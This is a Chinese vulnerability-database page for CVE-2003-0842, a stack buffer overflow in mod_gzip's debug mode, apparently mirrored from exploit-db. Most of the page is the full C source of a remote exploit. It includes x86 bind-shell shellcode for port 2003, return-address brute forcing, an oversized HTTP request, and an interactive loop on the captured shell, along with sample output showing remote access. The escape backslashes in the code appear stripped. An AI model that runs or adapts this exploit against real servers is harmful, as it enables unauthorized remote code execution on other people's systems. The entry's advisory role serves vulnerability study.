mod_gzip基于栈的缓冲区溢出漏洞

漏洞ID	1107587	漏洞类型	缓冲区溢出
发布时间	2003-11-20	更新时间	2003-11-20
CVE编号	CVE-2003-0842	CNNVD-ID	CNNVD-200311-049
漏洞平台	Linux	CVSS评分	7.5

|漏洞来源

https://www.exploit-db.com/exploits/126
https://www.securityfocus.com/bid/82726
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200311-049

|漏洞详情

mod_gzip1.3.26.1a及其早期版本和可能之后官方版本中的mod_gzip_printf存在基于栈的缓冲区溢出漏洞。当在调试模式下运行时，远程攻击者可以通过带有”Accept-Encoding:gzip”头的GET请求中的超长文件名执行任意代码。

|漏洞EXP

/*
  	[exploit code] for mod_gzip (with debug_mode) <= 1.2.26.1a
/
  	Created by xCrZx crazy_einstein yahoo com  /05.06.03/
/
  	Tested on RedHat 8.0 (Psyche) (here is target for it), 
/               also tested on FreeBSD 4.7 (1.3.19.2a) (here is no target for it :)
/

*/

/*

/	Single mode:

/  	[crz@blacksand crz]$ ./85mod_gzip -t 0 -h localhost
 
/  	remote exploit for mod_gzip (debug_mode) [Linux/*BSD]
                   	by xCrZx [[email protected]] /05.06.03/
/ 
  	Using: ret_err = 0x42127480, ret = 0xbfffd8f0
/ 
    	[!] Connecting to localhost:80
/      	[+] Connected!
      	[*] Trying to connect to localhost:2003 port!!! Pray for success!
/      	[*] Sleeping at 2 seconds...
 
/      	[!] Shell is accessible!
 
/      	uid=99(nobody) gid=99(nobody) groups=99(nobody)
      	Linux blacksand 2.4.18-14 #1 Wed Sep 4 13:35:50 EDT 2002 i686 i686 i386 GNU/Linux
/ 
	Brute mode:
/ 
	[crz@blacksand crz]$ ./85mod_gzip -h localhost -b 0xbfffffff -s 1000
/
	remote exploit for mod_gzip (debug_mode) [Linux/*BSD]
/        	         by xCrZx [[email protected]] /05.06.03/

/	Using: ret_err = 0x42127480, ret = 0xbfffffff ,step = 1000

/	[~] Brutemode activated!
	.
/	[!] Shell is accessible!

/	uid=99(nobody) gid=99(nobody) groups=99(nobody)
	Linux blacksand 2.4.18-14 #1 Wed Sep 4 13:35:50 EDT 2002 i686 i686 i386 GNU/Linux
/  

*/



#include <stdio.h>
#include <netinet/in.h>  
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>


#define STEP 1000

char fmt[] =

"POST /?%s HTTP/1.1rn"
"Content-Type: text/htmlrn"
"Host: %srn"
"Content-Length: %drn"
"Accept-Encoding: gzip, deflaternrn"
"%srnrn";

	 
struct TARGETS {
	char *distr;
	long ret;
	long std_err;
	char *shellcode;
	char *jmp;
} targets[] = { 
	
	/* you can add targets here */
	
	{"RedHat 8.0 (Psyche)",  // disributive info
	 0xbfffd8f0, // return address in stack
	 0x42127480, // address of stderr
	 //shellcode for Linux x86 -> bind shell on 2003 port//
         "x31xc0x89xc3xb0x02xcdx80x38xc3x74x05x8dx43x01xcdx80"
         "x31xc0x89x45x10x40x89xc3x89x45x0cx40x89x45x08x8dx4d"
         "x08xb0x66xcdx80x89x45x08x43x66x89x5dx14x66xc7x45x16"
         "x07xd3x31xd2x89x55x18x8dx55x14x89x55x0cxc6x45x10x10"
         "xb0x66xcdx80x40x89x45x0cx43x43xb0x66xcdx80x43x89x45"
         "x0cx89x45x10xb0x66xcdx80x89xc3x31xc9xb0x3fxcdx80x41"
         "x80xf9x03x75xf6x31xd2x52x68x6ex2fx73x68x68x2fx2fx62"
         "x69x89xe3x52x53x89xe1xb0x0bxcdx80",

     	/*

     	special jump instruction (to avoid bad characters in url):
      	(jump on our shellcode into heap)
 
 	movl $0xa1a51baa,%ebx
 	addl $0x66666666,%ebx
 	jmp *%ebx

      	*/
	 
        "xbbxaax1bxa5xa1x81xc3x66x66x66x66xffxe3"

	} };

	 
long getip(char *hostname) {
	struct hostent *he;
	long ipaddr;
	
	if ((ipaddr = inet_addr(hostname)) < 0) {
		if ((he = gethostbyname(hostname)) == NULL) {
			perror("gethostbyname()");
			exit(-1);
		}
		memcpy(&ipaddr, he->h_addr, he->h_length);
	}	
	return ipaddr;
}

void usage(char *prog) {

	int i=0;
	
printf("nUsage: %s <-h www.victim.com> [-p port] [-t target] [-r manual_retaddr] 
[-b addr] [-s step_num]nnTargets:n",prog);
while(targets[i++].distr) printf("t[%d] -> %sn",i-1,targets[i-1].distr);
printf("n");
exit(0);

}

int main(int argc, char **argv) {
 
    	int i=0;     
    	struct sockaddr_in sockstruct;
    	struct hostent *HOST;
    	char tmp[20000];
	char buf1[5000],buf2[10000];
    	int sock;
    	fd_set  rset;
	int port=80,shellport=2003;
	int step=STEP;
	char *victim=NULL;
	long ret=0xbfffffff,ret_err;
	int brutemode=0;
	char *shellcode,*jmp;
	int trg=0;

printf("nremote exploit for mod_gzip (debug_mode) [Linux/*BSD]ntt by xCrZx [crazy_einstein] /05.06.03/n");

	for(i=0;i<argc;i++) {
		if(argv[i][1]=='h') victim=argv[i+1];
		if(argv[i][1]=='p') port=atoi(argv[i+1]);
		if(argv[i][1]=='t') {ret=targets[atoi(argv[i+1])].ret;trg=atoi(argv[i+1]);}
               	if(argv[i][1]=='r') sscanf(argv[i+1],"0x%x",&ret);	
		if(argv[i][1]=='b') { brutemode=1; ret=strtoul(argv[i+1],0,16);}
		if(argv[i][1]=='s') { step=atoi(argv[i+1]);}
	}

	if(!victim || ret==0) usage(argv[0]);

	ret_err=targets[trg].std_err;
	shellcode=targets[trg].shellcode;
	jmp=targets[trg].jmp;

	printf("nUsing: ret_err = 0x%x, ret = 0x%x",ret_err,ret);
	if(brutemode) printf(" ,step = %dn",step);
	
	printf("n");
	
	if(brutemode)printf("[~] Brutemode activated!n");

	do {
    	
    	sock=socket(PF_INET,SOCK_STREAM,0);
    	sockstruct.sin_family=PF_INET; 
    	sockstruct.sin_addr.s_addr=getip(victim);
    	sockstruct.sin_port=htons(port);

    	if(!brutemode)printf("n[!] Connecting to %s:%dn",victim,port);
   
      	if(connect(sock,(struct sockaddr*)&sockstruct,sizeof(sockstruct))>-1) {

        	if(!brutemode)printf("[+] Connected!n",i);

		memset(tmp ,0x00,sizeof tmp );
               	memset(buf1,0x00,sizeof buf1);
	       	memset(buf2,0x00,sizeof buf2);

		memset(buf1,0x90,2016);
		memcpy(buf1+strlen(buf1),jmp,strlen(jmp));
		memset(buf1+strlen(buf1),0x90,2280);
		*(long *)&buf1[strlen(buf1)]=ret_err;
		for(i=0;i<100;i++) *(long *)&buf1[strlen(buf1)]=ret;

		memset(buf2,0x90,1000);
		memcpy(buf2+strlen(buf2),shellcode,strlen(shellcode));
		
		sprintf(tmp,fmt,buf1,victim,strlen(buf2),buf2);
		write(sock,tmp,strlen(tmp));

      	}else { printf("[x] Error: Could not connect to %s:%d!n",victim,port);exit(0);}
    
      	close(sock);

	ret-= step;

	if(brutemode) {printf(".");fflush(stdout);}
	

	if(!brutemode) {	
		printf("[*] Trying to connect to %s:%d port!!! Pray for success!n",victim,shellport);
		printf("[*] Sleeping at 2 seconds...n");
	}
	
	sleep(2);
	
       	sock=socket(PF_INET,SOCK_STREAM,0);

	bzero(sockstruct.sin_zero,sizeof(sockstruct.sin_zero));
	sockstruct.sin_family=PF_INET; 
       	sockstruct.sin_addr.s_addr=getip(victim);
       	sockstruct.sin_port=htons(shellport);

       	if(connect(sock,(struct sockaddr*)&sockstruct,sizeof(sockstruct))>-1) {
	        printf("n[!] Shell is accessible!nn");
	        write(sock, "id;uname -an", 12); 
	        while (1) {
	                FD_ZERO(&rset);
	                FD_SET(sock,&rset);
	                FD_SET(STDIN_FILENO,&rset);
	                select(sock + 1, &rset, NULL, NULL, NULL);

       			if (FD_ISSET(sock, &rset)) {
	                        i = read(sock, tmp, sizeof(tmp) - 1);
	                        if (i <= 0) {
	                                printf("[!] Connection closed.n");
	                                close(sock);
	                                exit(0);
	                        }
                        tmp[i] = 0;
                        printf("%s", tmp);
	                }
        	        if (FD_ISSET(STDIN_FILENO, &rset)) {
                	        i = read(STDIN_FILENO, tmp, sizeof(tmp) - 1);
                        	if (i > 0) {
                                	tmp[i]=0;
	                                write(sock, tmp, i);
        	                }
                	}
	        }
       	} else if(!brutemode)printf("[x] Shell is inaccessible..nn");

       	close(sock);

	} while ( brutemode );

      
    	return 0;
}

// milw0rm.com [2003-11-20]

|受影响的产品

Dag Apt Repository Mod Gzip 1.3.26.1A

|参考资料

来源:BUGTRAQ
名称:20030601Mod_gzipDebugModeVulnerabilities
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=105457180009860&w;=2
来源:BUGTRAQ
名称:20030601Mod_gzipDebugModeVulnerabilities
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=105457180009860&w;=2

相关推荐: Watchguard FireboxII Password Retrieval Vulnerability

Watchguard FireboxII Password Retrieval Vulnerability 漏洞ID 1103528 漏洞类型 Unknown 发布时间 2001-01-20 更新时间 2001-01-20 CVE编号 N/A CNNVD-ID…

文章版权归作者所有，未经允许请勿转载。

THE END